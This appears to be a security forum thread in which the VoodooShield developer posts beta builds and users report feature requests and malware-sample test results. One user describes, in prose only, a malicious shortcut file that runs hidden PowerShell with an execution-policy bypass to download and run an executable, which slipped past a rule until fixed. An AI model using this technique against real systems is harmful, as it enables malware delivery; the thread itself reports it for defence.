Update VoodooShield 7.0

Thread Tags
  1. Developer is currently beta testing this product.

n8chavez

Level 9
Well-known
Feb 26, 2021
430
Well, off the top of my head I can think of one important rule parameter I'd like to see. I use, and will always only use, VS with SBIE on a RAM disk. It woiuld be awesome to see an "except" rule. Meaning, I'd like the ability to create a rule that blocks things from running on my RAM disk that does not have a valid signature (+ maybe even VS AI) Currently, I can block all things on s: (my ram drive). And because it's a hard rule, every thing gets blocked no matter what. An exception parameter allowing anything with a valid signature, but blocking everything else, would be nice. Make sense, or am I retarded?

(I assume a little bit of column A and B :) )
 

harlan4096

Moderator
Verified
Staff member
Malware Hunter
Well-known
Apr 28, 2015
8,019
Calling MT Malware hunters! Maybe a new round of testing will be in order once the new VS ML/Ai is finalized and out of Beta. Testing with WLC disabled would be my preference.
Since it seems there is something still in beta, and We are already in summer, soon I will move (as every summer time), so I will stop testing (old lap during this time), I can run a new VS test in Hub in September...
 
Last edited:

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Well, off the top of my head I can think of one important rule parameter I'd like to see. I use, and will always only use, VS with SBIE on a RAM disk. It woiuld be awesome to see an "except" rule. Meaning, I'd like the ability to create a rule that blocks things from running on my RAM disk that does not have a valid signature (+ maybe even VS AI) Currently, I can block all things on s: (my ram drive). And because it's a hard rule, every thing gets blocked no matter what. An exception parameter allowing anything with a valid signature, but blocking everything else, would be nice. Make sense, or am I retarded?

(I assume a little bit of column A and B :) )
Thank you for the suggestion, I think I know what you mean, I will play around with it and see. Also, if anyone has created any rules that do not work as expected, please let me know and we will try to make the rules make sense for everyone.
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey Guys!

Here is 7.18, I think we are getting pretty close to a public release. There were quite a few changes to the User Prompt, so there might be a small bug or two we need to fix in the User Prompt.

You can now test the new local VoodooAi by either putting VS into Offline Mode (right click on VS gadget and choose Offline Mode) , or simply disable your network adapter. If you disable the internet in your router, VS will spend several seconds checking for an internet connection, so Offline Mode or disabling the network adapter is a lot better for testing.


VS 7.18
SHA-256: 463568df24277764fe54acfff32622b1ef116cc0333366383fb785780316dbf2


Thank you,

Dan
 

Zartarra

Level 6
Verified
Well-known
May 9, 2019
265
Hello Dan

I was curious about the ML component in version 7.18. So I tested it today agains a small batch (around 50) of new malware samples. It blocked nearly all samples. It only gave 2 samples a very low sage score and 2 with a medium score.

New version looks great :).

Kind regards,

Zartarra
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hello Dan

I was curious about the ML component in version 7.18. So I tested it today agains a small batch (around 50) of new malware samples. It blocked nearly all samples. It only gave 2 samples a very low sage score and 2 with a medium score.

New version looks great :).

Kind regards,

Zartarra
Thank you Zartarra for testing, I appreciate that! Yeah, there almost seems to be a hard mathematical limit on ML/Ai for around 95% efficacy for malware detection ;). We could make it more aggressive, but that would pretty much just increase the false positives, and do very little for the false negatives. So I am pretty happy where it currently is, especially with WLC covering what VoodooAi might miss.
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey Guys!

Here is the latest version of VoodooShield. It should be ready for public release on Monday, but if you find anything please let me know!

As you have noticed, we are transitioning a lot of VS’s features from the cloud to the local computer. Not only is it faster, but there are no disadvantages in doing so, there are only advantages.

Version 7.20 now includes a list of VS’s verified digital signatures (there are 14,000+), so cloud lookups for this feature are no longer required. The purpose of this feature is to mitigate against signed malware, not to allow items simply by the signer’s name. That would be very, very dangerous.

In other words, this list is not yet editable, and we probably do not need to ever make it editable, simply because VS already handles digital signatures in a much more comprehensive way.

I forgot to mention, one of the 250+ Ai features is still cloud based. It is the feature that verifies the digital signature in the cloud. So if you test VoodooAi in Offline Mode, this feature will be ignored, so the VoodooAi result might be a little higher than it would be otherwise. No big deal either way, but if the results do not match, that is why. Technically, we could have a different model for Offline Mode that removes this feature from the training data set as well, but I kinda like it the way it is. Basically, VoodooAi might be slightly more aggressive when in Offline Mode, which means WLC is not active and covering what VoodooAi might miss. So in that case, being a little more aggressive might be a good thing.

I have not yet started refining the Rules feature, but will do that soon. I wanted to finish this version of VS and the new DefenderUI so we can release them to the public. Refining the Rules is going to take a little time to do properly, and we will certainly want to test some beta versions before we release the updated Rules feature to the public.

VS 7.20
SHA-256: 97f85bfce8d6c0676f20dfbde7067360f583dc89bc26d5e85410871fbdaea7cc


Thank you guys!

Dan
 

Zartarra

Level 6
Verified
Well-known
May 9, 2019
265
Thank you Zartarra for testing, I appreciate that! Yeah, there almost seems to be a hard mathematical limit on ML/Ai for around 95% efficacy for malware detection ;). We could make it more aggressive, but that would pretty much just increase the false positives, and do very little for the false negatives. So I am pretty happy where it currently is, especially with WLC covering what VoodooAi might miss.
Hello Dan,

I tested today some more samples. 46 samples of the 200 got a safe stamp for VoodooAI. 199 get blocked with Internet connection (y). One sample was not detected. It was a sample that was using a link file. I am still using Voodooshield version 7.18.

The lnk contains a Powershell command with the ExecutionBypass option and Windows style hidden. It calls a .Net webclient to download a file from a website and runs the exe in the background. Is there an option available in Voodooshield to block that kind of attacks?

With kind regards,

Zartarra
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hello Dan,

I tested today some more samples. 46 samples of the 200 got a safe stamp for VoodooAI. 199 get blocked with Internet connection (y). One sample was not detected. It was a sample that was using a link file. I am still using Voodooshield version 7.18.

The lnk contains a Powershell command with the ExecutionBypass option and Windows style hidden. It calls a .Net webclient to download a file from a website and runs the exe in the background. Is there an option available in Voodooshield to block that kind of attacks?

With kind regards,

Zartarra
Thank you for testing! When you get a chance, can you please send the misses to support at voodooshield.com? Please keep in mind that malware packs a lot of times contain duplicates and safe files, both which can skew test results. Duplicates are bad because if the same file is missed, and 10% of the files are the same file, the results are way off.

Yeah, VS should have no issue blocking the .lnk file. If it appears to have bypassed VS, please send me that as well. Thanks again!
 

plat

Level 27
Verified
Top poster
Well-known
Sep 13, 2018
1,675
Hey everyone! Ok, so I have my Windows 11 drive installed and I see Razer is trying yet again to install its unwanted driver. So I go to MajorGeeks to get the wushowhide program and VS promptly blocks it. Here is the message:

vswushowhide.png

There's no way to exclude this specific application, is there? It's msdt. all or nothing? Yep, msdt as in Follina msdt. Also: updated to VS 7.20 thru the UI. (y)

A request if it's not already there and I'm missing it somehow: is there any way to disable VS temporarily in the right-click menu off the system tray icon? This feature is available in OSArmor and Sandboxie. I'd rather not exit VS altogether even though it's quickly brought back via the desktop icon. Sorry for the newby-ish question but it's really convenient to work from the systray.
 

Gandalf_The_Grey

Level 62
Verified
Helper
Top poster
Content Creator
Well-known
Apr 24, 2016
5,109
Hey everyone! Ok, so I have my Windows 11 drive installed and I see Razer is trying yet again to install its unwanted driver. So I go to MajorGeeks to get the wushowhide program and VS promptly blocks it. Here is the message:


There's no way to exclude this specific application, is there? It's msdt. all or nothing? Yep, msdt as in Follina msdt. Also: updated to VS 7.20 thru the UI. (y)

A request if it's not already there and I'm missing it somehow: is there any way to disable VS temporarily in the right-click menu off the system tray icon? This feature is available in OSArmor and Sandboxie. I'd rather not exit VS altogether even though it's quickly brought back via the desktop icon. Sorry for the newby-ish question but it's really convenient to work from the systray.
It's 2 clicks to change your current mode to DISABLE/INSTALL mode.

And 1 click if you disable the simple right click menu in UI Tweaks.

1656616522107.png
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey everyone! Ok, so I have my Windows 11 drive installed and I see Razer is trying yet again to install its unwanted driver. So I go to MajorGeeks to get the wushowhide program and VS promptly blocks it. Here is the message:


There's no way to exclude this specific application, is there? It's msdt. all or nothing? Yep, msdt as in Follina msdt. Also: updated to VS 7.20 thru the UI. (y)

A request if it's not already there and I'm missing it somehow: is there any way to disable VS temporarily in the right-click menu off the system tray icon? This feature is available in OSArmor and Sandboxie. I'd rather not exit VS altogether even though it's quickly brought back via the desktop icon. Sorry for the newby-ish question but it's really convenient to work from the systray.
Yes, this is absolutely a 100% correct block... it's for mitigating DogWalk.

If you are not familiar with DogWalk, it would be well worth 15-20 minute research, only because it is quite interesting.

 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hello Dan,

I tested today some more samples. 46 samples of the 200 got a safe stamp for VoodooAI. 199 get blocked with Internet connection (y). One sample was not detected. It was a sample that was using a link file. I am still using Voodooshield version 7.18.

The lnk contains a Powershell command with the ExecutionBypass option and Windows style hidden. It calls a .Net webclient to download a file from a website and runs the exe in the background. Is there an option available in Voodooshield to block that kind of attacks?

With kind regards,

Zartarra
Thank you for sending me the samples! We do need to download some new samples to add to the training data set, then retrain the models. The current model uses the training data set from a year or so ago, and it held up to most of the samples that I threw at it, but obviously I need to add some newer ones as well, like the ones that you found.

BTW, if anyone knows of any really cool new malware depositories, please let me know. I want to add as much variety as we can.

Also, thank you for finding the lnk bypass, there is a bug in one of VS's rules and it is an easy fix. So yes, VS will block this in the next version... this is just a bug in the Contextual Engine, but an easy fix. Thanks again, I appreciate your help!
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
Hey Guys!

Zartarra found a significant lnk bug in VS’s new contextual engine, but it is fixed in this version (thank you @Zartarra!).

There are a couple of other optimizations in this version as well, but I have not finished optimizing the Rules feature yet.

We still need to add new malware to VS’s new VoodooAi and retrain the models, which should be finished in a few days, but other than that I believe we are good to go.


VS 7.21
SHA-256: 4a28671b403f7da2acb843b923d7f3f25830f6bf0a5992c31ed5971ed71a84ff


Thank you,

Dan
 

danb

From VoodooShield
Thread author
Verified
Top poster
Developer
Well-known
May 31, 2017
1,280
I hope he/she got a really long lasting license now ;)
VS 7.20 so far running good.
I would be happy to setup a long lasting license for @Zartarra! Please email me the email account you would like to use for your account and I will do so.

BTW, I just noticed that VS 7.21 is blocking DefenderUI's command lines, so I need to think about and refine that rule a little more.
 

Zartarra

Level 6
Verified
Well-known
May 9, 2019
265
Thank you for sending me the samples! We do need to download some new samples to add to the training data set, then retrain the models. The current model uses the training data set from a year or so ago, and it held up to most of the samples that I threw at it, but obviously I need to add some newer ones as well, like the ones that you found.

BTW, if anyone knows of any really cool new malware depositories, please let me know. I want to add as much variety as we can.

Also, thank you for finding the lnk bypass, there is a bug in one of VS's rules and it is an easy fix. So yes, VS will block this in the next version... this is just a bug in the Contextual Engine, but an easy fix. Thanks again, I appreciate your help!
Hello Dan,

I am glad to help :). The new version is installed.